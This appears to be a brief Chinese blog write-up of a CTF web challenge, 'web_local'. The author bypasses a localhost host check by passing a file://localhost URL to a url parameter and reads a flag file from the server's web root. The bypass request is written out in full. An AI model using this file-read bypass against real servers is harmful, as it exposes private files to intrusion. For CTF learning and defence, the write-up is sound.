学逆向之web_local

访问题目就能看到源码

xuenixiang_2021_web_local

发现host需要是localhost,本来可直接用file/var/www/html/flag.php协议读取源码

那么我们利用file://localhost绕过即可,加上localhost不影响结果,也能出flag
view-source:http://127.0.0.1:8005/?url=file://localhost/var/www/html/flag.php
xuenixiang_2021_web_local

利用file://localhost绕过即可

posted @ 2021-11-01 21:17  kalibb  阅读(81)  评论(0编辑  收藏  举报